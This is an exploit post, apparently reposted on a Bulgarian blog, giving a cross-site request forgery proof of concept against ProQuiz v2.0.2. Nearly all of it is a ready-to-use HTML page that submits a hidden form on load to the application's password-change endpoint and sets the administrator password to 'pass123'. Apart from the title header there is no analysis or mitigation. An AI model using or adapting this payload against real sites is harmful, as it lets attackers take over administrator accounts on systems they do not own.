##########################################

[~] Exploit Title: ProQuiz v2.0.2 CSRF Vulnerability

[~] Author: DaOne

[~] Date: 19/8/2012

[~] Software Link: http://code.google.com/p/proquiz/downloads/list

##########################################



[#] [ CSRF Change Admin Password ]



</form>

<html>

<body onload="document.form0.submit();">

<form method="POST" name="form0" action="http://[target]/functions.php?action=edit_profile&type=password">

<input type="hidden" name="password" value="pass123"/>

<input type="hidden" name="cpassword" value="pass123"/>

</form>

</body>

</html>



##########################################
Rate this post
Брой прочитания на тази страница: 1110
ProQuiz v2.0.2 CSRF Vulnerability
Tagged on:

Вашият коментар

Вашият имейл адрес няма да бъде публикуван. Задължителните полета са отбелязани с *